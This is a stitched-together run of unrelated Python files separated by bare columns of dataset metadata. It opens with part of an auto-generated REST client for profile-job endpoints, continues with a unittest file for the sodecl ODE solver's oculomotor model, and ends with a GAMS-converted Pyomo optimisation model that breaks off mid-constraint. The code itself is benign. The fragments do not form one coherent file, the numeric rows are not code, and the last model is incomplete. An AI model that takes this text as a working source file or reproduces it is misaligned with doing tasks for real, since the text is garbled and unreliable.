            '/profile-jobs', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ProfileJobList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_profile_job_by_id(self, profile_job_id, **kwargs):  # noqa: E501
        """Get profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_profile_job_by_id(profile_job_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to get (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always return the deserialized ProfileJob only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_profile_job_by_id_with_http_info(profile_job_id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_profile_job_by_id_with_http_info(profile_job_id, **kwargs)  # noqa: E501
            return data

    def get_profile_job_by_id_with_http_info(self, profile_job_id, **kwargs):  # noqa: E501
        """Get profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_profile_job_by_id_with_http_info(profile_job_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to get (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['profile_job_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject keyword arguments this endpoint does not understand.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_profile_job_by_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'profile_job_id' is set
        if self.api_client.client_side_validation and ('profile_job_id' not in params or
                                                       params['profile_job_id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `profile_job_id` when calling `get_profile_job_by_id`")  # noqa: E501

        collection_formats = {}

        # The job id is substituted into the URL path, not sent as a query.
        path_params = {}
        if 'profile_job_id' in params:
            path_params['profileJobId'] = params['profile_job_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/profile-jobs/{profileJobId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ProfileJob',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update_profile_job(self, profile_job_id, body, **kwargs):  # noqa: E501
        """Update profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.update_profile_job(profile_job_id, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to update (required)
        :param ProfileJob body: The updated profile job (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always return the deserialized (updated) ProfileJob only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_profile_job_with_http_info(profile_job_id, body, **kwargs)  # noqa: E501
        else:
            (data) = self.update_profile_job_with_http_info(profile_job_id, body, **kwargs)  # noqa: E501
            return data

    def update_profile_job_with_http_info(self, profile_job_id, body, **kwargs):  # noqa: E501
        """Update profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.update_profile_job_with_http_info(profile_job_id, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to update (required)
        :param ProfileJob body: The updated profile job (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['profile_job_id', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject keyword arguments this endpoint does not understand.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_profile_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'profile_job_id' is set
        if self.api_client.client_side_validation and ('profile_job_id' not in params or
                                                       params['profile_job_id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `profile_job_id` when calling `update_profile_job`")  # noqa: E501
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in params or
                                                       params['body'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `body` when calling `update_profile_job`")  # noqa: E501

        collection_formats = {}

        # The job id goes into the URL path; the updated job is the body.
        path_params = {}
        if 'profile_job_id' in params:
            path_params['profileJobId'] = params['profile_job_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/profile-jobs/{profileJobId}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ProfileJob',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 40
| 142
| 0.612988
| 2,457
| 20,480
| 4.832316
| 0.06919
| 0.080856
| 0.045481
| 0.030321
| 0.942559
| 0.937589
| 0.923271
| 0.900615
| 0.895393
| 0.892698
| 0
| 0.014683
| 0.30166
| 20,480
| 511
| 143
| 40.078278
| 0.81548
| 0.326416
| 0
| 0.781818
| 1
| 0
| 0.181548
| 0.035871
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.014545
| 0
| 0.112727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0eaf0157a2a4f543280246feb04ca192d4058d32
| 5,384
|
py
|
Python
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 13
|
2018-01-19T14:08:33.000Z
|
2021-04-08T06:40:58.000Z
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 11
|
2017-10-23T13:40:27.000Z
|
2020-08-02T07:50:08.000Z
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 4
|
2018-05-15T15:07:26.000Z
|
2021-04-08T06:41:01.000Z
|
import unittest
import numpy
import random
import pickle
import sodecl
class TestPythonWrapper(unittest.TestCase):
    """Regression tests for the sodecl Python wrapper.

    Each test integrates the oculomotor model with a different solver and
    compares the resulting trajectories against pickled reference results.
    The four original tests were identical except for the solver id, the
    time step, the kernel-step count and the reference file, so the shared
    body lives in :meth:`_run_oculomotor`.
    """

    def _run_oculomotor(self, solver, dt, ksteps, reference_pkl):
        """Integrate the oculomotor model and assert closeness to a reference.

        :param int solver: sodecl solver id (1=euler, 2=rk, 3=ie, 4=im)
        :param float dt: integration time step
        :param int ksteps: number of kernel steps
        :param str reference_pkl: path to the pickled reference results
        """
        openclplatform = 0
        opencldevice = 0
        openclkernel = 'oculomotor.cl'
        tspan = 0.1
        localgroupsize = 0

        orbits = 2
        nequat = 6
        nparams = 6
        nnoi = 0

        # Initial conditions: states 0-4 start at rest, state 5 at 2.0
        # (same for every orbit).
        initx = numpy.ndarray((orbits, nequat))
        for o in range(orbits):
            initx[o][0] = 0.0
            initx[o][1] = 0.0
            initx[o][2] = 0.0
            initx[o][3] = 0.0
            initx[o][4] = 0.0
            initx[o][5] = 2.0

        # Parameters values (identical across orbits).
        params = numpy.ndarray((orbits, nparams))
        for o in range(orbits):
            params[o][0] = 120
            params[o][1] = 1.5
            params[o][2] = 0.0045
            params[o][3] = 0.05
            params[o][4] = 600
            params[o][5] = 9

        t, results = sodecl.sodecl(openclplatform, opencldevice, openclkernel,
                                   initx, params, solver,
                                   orbits, nequat, nnoi,
                                   dt, tspan, ksteps, localgroupsize)

        # Use a context manager so the reference file handle is closed
        # (the original pickle.load(open(...)) leaked it).
        with open(reference_pkl, "rb") as f:
            test_results = pickle.load(f)
        self.assertTrue(numpy.isclose(results, test_results).all())

    def test_oculomotor_euler(self):
        # Euler needs a much smaller dt (and more kernel steps) to stay stable.
        self._run_oculomotor(solver=1, dt=1e-8, ksteps=40000,
                             reference_pkl="data/oculomotor_euler.pkl")

    def test_oculomotor_rk(self):
        self._run_oculomotor(solver=2, dt=1e-6, ksteps=400,
                             reference_pkl="data/oculomotor_rk.pkl")

    def test_oculomotor_ie(self):
        self._run_oculomotor(solver=3, dt=1e-6, ksteps=400,
                             reference_pkl="data/oculomotor_ie.pkl")

    def test_oculomotor_im(self):
        self._run_oculomotor(solver=4, dt=1e-6, ksteps=400,
                             reference_pkl="data/oculomotor_im.pkl")
# Allow running this test module directly: python sodecl_python_tests.py
if __name__ == '__main__':
    unittest.main()
| 29.420765
| 78
| 0.476412
| 611
| 5,384
| 4.152209
| 0.114566
| 0.05676
| 0.055183
| 0.063067
| 0.926291
| 0.926291
| 0.926291
| 0.926291
| 0.926291
| 0.828538
| 0
| 0.071047
| 0.409175
| 5,384
| 182
| 79
| 29.582418
| 0.726501
| 0.027303
| 0
| 0.851351
| 0
| 0
| 0.030413
| 0.017406
| 0
| 0
| 0
| 0
| 0.027027
| 1
| 0.027027
| false
| 0
| 0.033784
| 0
| 0.067568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ebefd2516a631c322bd8415895dbe55590b4cf3
| 23,705
|
py
|
Python
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 2
|
2021-07-03T13:19:10.000Z
|
2022-02-06T10:48:13.000Z
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 1
|
2021-07-04T14:52:14.000Z
|
2021-07-15T10:17:11.000Z
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | null | null | null |
# NLP written by GAMS Convert at 04/21/18 13:51:12
#
# Equation counts
# Total E G L N X C B
# 78 68 10 0 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 87 87 0 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 616 176 440 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
# Variable declarations.  The generated file listed each of the 86 variables
# on its own line; they fall into four uniform groups, so the groups are
# created in loops.  Assigning a component to a model attribute (here via
# setattr) registers it with Pyomo exactly as an explicit `m.xN = Var(...)`
# statement would, so the resulting model is unchanged.
m.x1 = Var(within=Reals, bounds=(0, None), initialize=0)
# x2..x11: bounded in [0, 10000], initialized at 1.
for _i in range(2, 12):
    setattr(m, 'x%d' % _i, Var(within=Reals, bounds=(0, 10000), initialize=1))
# x12..x66: fraction-like variables in [0, 1], initialized at 0.01.
for _i in range(12, 67):
    setattr(m, 'x%d' % _i, Var(within=Reals, bounds=(0, 1), initialize=0.01))
# x67..x86: bounded in [0, 1000], initialized at 0 (these are the terms
# summed in the objective below).
for _i in range(67, 87):
    setattr(m, 'x%d' % _i, Var(within=Reals, bounds=(0, 1000), initialize=0))
# Minimize the total of the deviation variables x67..x86 (the same linear
# expression the generated file spelled out term by term).
m.obj = Objective(
    expr=sum(getattr(m, 'x%d' % _i) for _i in range(67, 87)),
    sense=minimize)
# ---------------------------------------------------------------------------
# Constraints (coefficients copied verbatim from the GAMS-converted
# bayes2_20 model).
#
# c1..c55 all share the bilinear pattern
#     a*x_j - y*(a_1*x_2 + ... + a_n*x_11) == 0
# where y is one of the ratio variables x12..x66: whenever the bracketed
# total is nonzero, y is forced to equal the share of the term a*x_j in
# that total.  NOTE(review): the statistical meaning of the coefficients is
# not visible here; values are taken on trust from the generated source.
# ---------------------------------------------------------------------------
m.c1 = Constraint(expr=0.2*m.x2 - m.x12*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c2 = Constraint(expr=0.32003200320032*m.x3 - m.x13*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c3 = Constraint(expr=0.0399839983998399*m.x3 - m.x14*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c4 = Constraint(expr=0.3840672124824*m.x4 - m.x15*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c5 = Constraint(expr=0.0959807923180794*m.x4 - m.x16*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c6 = Constraint(expr=0.00799040096048009*m.x4 - m.x17*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c7 = Constraint(expr=0.409692183046145*m.x5 - m.x18*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c8 = Constraint(expr=0.153596150395582*m.x5 - m.x19*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c9 = Constraint(expr=0.0255769561603844*m.x5 - m.x20*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c10 = Constraint(expr=0.001596161920384*m.x5 - m.x21*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c11 = Constraint(expr=0.409702429449282*m.x6 - m.x22*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c12 = Constraint(expr=0.204825598716796*m.x6 - m.x23*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c13 = Constraint(expr=0.0511679852758392*m.x6 - m.x24*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c14 = Constraint(expr=0.00638720256256101*m.x6 - m.x25*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c15 = Constraint(expr=0.000318721407871794*m.x6 - m.x26*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c16 = Constraint(expr=0.393314332271309*m.x7 - m.x27*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c17 = Constraint(expr=0.245821457669569*m.x7 - m.x28*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c18 = Constraint(expr=0.0818892538741687*m.x7 - m.x29*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c19 = Constraint(expr=0.0153350375081317*m.x7 - m.x30*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c20 = Constraint(expr=0.00153062807182051*m.x7 - m.x31*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c21 = Constraint(expr=6.36167292350403e-5*m.x7 - m.x32*(
    6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8
    + 0.00114135256538535*m.x9 + 0.00274075394854443*m.x10
    + 0.00548438828108048*m.x11) == 0)
m.c22 = Constraint(expr=0.367084193942431*m.x8 - m.x33*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c23 = Constraint(expr=0.275347581122294*m.x8 - m.x34*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c24 = Constraint(expr=0.114670766025168*m.x8 - m.x35*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c25 = Constraint(expr=0.0286354282546281*m.x8 - m.x36*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c26 = Constraint(expr=0.00428779555860749*m.x8 - m.x37*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c27 = Constraint(expr=0.00035646756425478*m.x8 - m.x38*(
    6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8
    + 0.00114135256538535*m.x9 + 0.00274075394854443*m.x10
    + 0.00548438828108048*m.x11) == 0)
m.c28 = Constraint(expr=1.26927914843577e-5*m.x8 - m.x39*(
    1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9
    + 0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c29 = Constraint(expr=0.335603041715*m.x9 - m.x40*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c30 = Constraint(expr=0.2937261297672*m.x9 - m.x41*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c31 = Constraint(expr=0.146807956791712*m.x9 - m.x42*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c32 = Constraint(expr=0.0458315860606947*m.x9 - m.x43*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c33 = Constraint(expr=0.00915141635884911*m.x9 - m.x44*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c34 = Constraint(expr=0.00114135256538535*m.x9 - m.x45*(
    6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8
    + 0.00114135256538535*m.x9 + 0.00274075394854443*m.x10
    + 0.00548438828108048*m.x11) == 0)
m.c35 = Constraint(expr=8.12907690382152e-5*m.x9 - m.x46*(
    1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9
    + 0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c36 = Constraint(expr=2.53144535458066e-6*m.x9 - m.x47*(
    2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10
    + 7.30205954460765e-5*m.x11) == 0)
m.c37 = Constraint(expr=0.302020066201112*m.x10 - m.x48*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c38 = Constraint(expr=0.302133422913057*m.x10 - m.x49*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c39 = Constraint(expr=0.176200402504464*m.x10 - m.x50*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c40 = Constraint(expr=0.0660172990246554*m.x10 - m.x51*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c41 = Constraint(expr=0.0164795558845939*m.x10 - m.x52*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c42 = Constraint(expr=0.00274075394854443*m.x10 - m.x53*(
    6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8
    + 0.00114135256538535*m.x9 + 0.00274075394854443*m.x10
    + 0.00548438828108048*m.x11) == 0)
m.c43 = Constraint(expr=0.000292844463262116*m.x10 - m.x54*(
    1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9
    + 0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c44 = Constraint(expr=1.82409993524627e-5*m.x10 - m.x55*(
    2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10
    + 7.30205954460765e-5*m.x11) == 0)
m.c45 = Constraint(expr=5.04667648751466e-7*m.x10 - m.x56*(
    5.04667648751466e-7*m.x10 + 4.04097807027501e-6*m.x11) == 0)
m.c46 = Constraint(expr=0.268435410656179*m.x11 - m.x57*(
    0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4
    + 0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7
    + 0.367084193942431*m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10
    + 0.268435410656179*m.x11) == 0)
m.c47 = Constraint(expr=0.302140983052761*m.x11 - m.x58*(
    0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 + 0.153596150395582*m.x5
    + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
    + 0.2937261297672*m.x9 + 0.302133422913057*m.x10
    + 0.302140983052761*m.x11) == 0)
m.c48 = Constraint(expr=0.201402121569511*m.x11 - m.x59*(
    0.00799040096048009*m.x4 + 0.0255769561603844*m.x5
    + 0.0511679852758392*m.x6 + 0.0818892538741687*m.x7
    + 0.114670766025168*m.x8 + 0.146807956791712*m.x9
    + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c49 = Constraint(expr=0.0880472935145168*m.x11 - m.x60*(
    0.001596161920384*m.x5 + 0.00638720256256101*m.x6
    + 0.0153350375081317*m.x7 + 0.0286354282546281*m.x8
    + 0.0458315860606947*m.x9 + 0.0660172990246554*m.x10
    + 0.0880472935145168*m.x11) == 0)
m.c50 = Constraint(expr=0.0263778458318911*m.x11 - m.x61*(
    0.000318721407871794*m.x6 + 0.00153062807182051*m.x7
    + 0.00428779555860749*m.x8 + 0.00915141635884911*m.x9
    + 0.0164795558845939*m.x10 + 0.0263778458318911*m.x11) == 0)
m.c51 = Constraint(expr=0.00548438828108048*m.x11 - m.x62*(
    6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8
    + 0.00114135256538535*m.x9 + 0.00274075394854443*m.x10
    + 0.00548438828108048*m.x11) == 0)
m.c52 = Constraint(expr=0.000781426623017516*m.x11 - m.x63*(
    1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9
    + 0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c53 = Constraint(expr=7.30205954460765e-5*m.x11 - m.x64*(
    2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10
